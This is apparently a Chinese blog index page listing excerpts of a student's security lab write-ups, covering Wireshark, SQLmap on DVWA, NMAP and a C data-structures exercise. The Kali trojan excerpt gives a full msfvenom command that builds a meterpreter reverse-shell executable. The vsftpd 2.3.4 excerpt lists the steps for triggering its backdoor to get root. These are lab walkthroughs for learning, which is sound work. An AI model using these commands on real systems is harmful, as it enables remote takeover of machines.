自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(9)
  • 收藏
  • 关注

原创 FTP数据还原

FTP(File Transfer Protocol):是应用层的一个文件传输协议。主要作用是在服务器和客户端之间实现文件的传输和共享。FTP协议:允许TCP/IP网络上的两台计算机之间进行文件传输。而FTP服务是基于FTP协议的文件传输服务。工作时,一台计算机上运行FTP客户端应用程序,另一台计算机上需要运行FTP服务器端程序。只有拥有了FTP服务,客户端才能进行文件传输。利用WireShark打开实验实验数据data.pcapng。FTP服务器的IP地址是192.168.182.132.

2021-12-15 10:37:17 3019

原创 DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable2虚拟机。1、注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1First name: adminSurname: admin返回正常;再次输入1',报错,返回You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right synta.

2021-12-15 10:21:29 285

原创 使用Wireshark软件抓包

实验网络拓扑1、A主机上外网,B运行sinffer(Wireshark)选定只抓源为A的数据)。1.1 写出以上过滤语句。这里我们在虚拟机中用kali来抓取win10的数据,首先要先确定我们的目标机和靶机在同一网段下,然后打开Wireshark,这里我们看到靶机的ip地址。ip.src==192.168.254.11.2 B是否能看到A和外网的通信(A刚输入的帐户和口令)?为什么? 不能,A和B所处的环境是在交换型以...

2021-12-15 10:04:02 2586

原创 NMAP使用

利用NMAP(攻击方)扫描发现Metasploitable2(靶机,需下载虚拟机镜像)IP地址,同时Wireshark捕获报文,分析NMAP扫描发现该主机的工作原理,即报文交互情况由上图可以看出两者实现链接是通过TCP协议:TCP(Transmission Control Protocol 传输控制协议)是一种面向连接(连接导向)的、可靠的、 基于IP的传输层协议。TCP工作在网络OSI的七层模型中的第四层——Transport层,IP在第三层——Network层,ARP 在第二层——Data L

2021-12-15 09:51:58 271

原创 漏洞复现:使用Kali制作木马程序

攻击机:Kali2019靶机:Win7 64位攻击步骤:1.打开Kali2019和Win7 64位虚拟机,确定IP地址在一个网段2.确定好IP地址,进入Kali2019进行木马文件.exe制作,命令如下命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=172.16.66.128 LPORT=5555 -f exe >pink.exe.

2021-12-15 09:38:39 5853

原创 笑脸漏洞利用

靶机metasploit :192.168.153.132使用nmap对靶机进行信息收集这里可以看到21端口是开放的,版本是vsftpd2.3.4,所以笑脸漏洞是存在的直接ftp连接靶机用户名:user:)密码随便填写这时靶机的6200端口会开启接下来用nc连接即可最后直接可以获取root权限了原文链接:https://blog.csdn.net/m0_62210217/article/details/121085654...

2021-12-15 09:35:05 3108

原创 数据结构:用链表表示多项式,并实现多项式的加法运算(C语言)

输入格式:输入在第一行给出第一个多项式POLYA的系数和指数,并以0,0 结束第一个多项式的输入;在第二行出第一个多项式POLYB的系数和指数,并以0,0 结束第一个多项式的输入。输出格式:对每一组输入,在一行中输出POLYA+POLYB和多项式的系数和指数。输入样例:5,0 2,1 1,6 8,15 0,0-2,1 3,6 4,8 0,0输出样例:5,0 4,6 4,8 8,15 分析首先要进行头文件的说明和结构体的定义#include<stdi.

2021-11-05 16:54:20 8616 6

转载 ifconfig 命令

1.命令格式: ifconfig[网络设备][参数]2.命令功能:ifconfig命令用来查看和配置网络设备。当网络环境发生改变时可通过此命令对网络进行相应的配置。3.命令参数:up: 启动指定网络设备/网卡。down :关闭指定网络设备/网卡。该参数可以有效地阻止通过指定接口的IP信息流,如果想永久地关闭一个接口,我们还需要从核心路由表中将该接口的路由信息全部删除。arp: 设置指定网卡是否支持ARP协议。-promisc :设置是否支持...

2021-11-01 17:20:42 5874 1

原创 2021-10-11

1. 什么是等保2.0我这里摘取知乎中知道创宇的回答:什么是等保2.0? - 知乎等保2.0于在2019年12月1日开始实施等保1.0回顾在开始讲等保2.0之前,让我们先回顾一下等保1.0。等保1.0发布距今已经有10多年的时间,在这些日子里,网络安全也越来越被人们所重视。在1.0的初期,企业只要有安全意识,能开始做等保,开始测评就已经很不错了;到了中期,整体防护,渗透测试,合规开始等于安全。行业等级保护全面开展,等保开始逐渐的深入人心;再到1.0的后期,无论是企业层面还是国家层面,都更

2021-10-11 14:14:19 235 1

Crimson V3 协议识别.pcapng

Crimson V3 协议识别.pcapng

2022-12-19

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除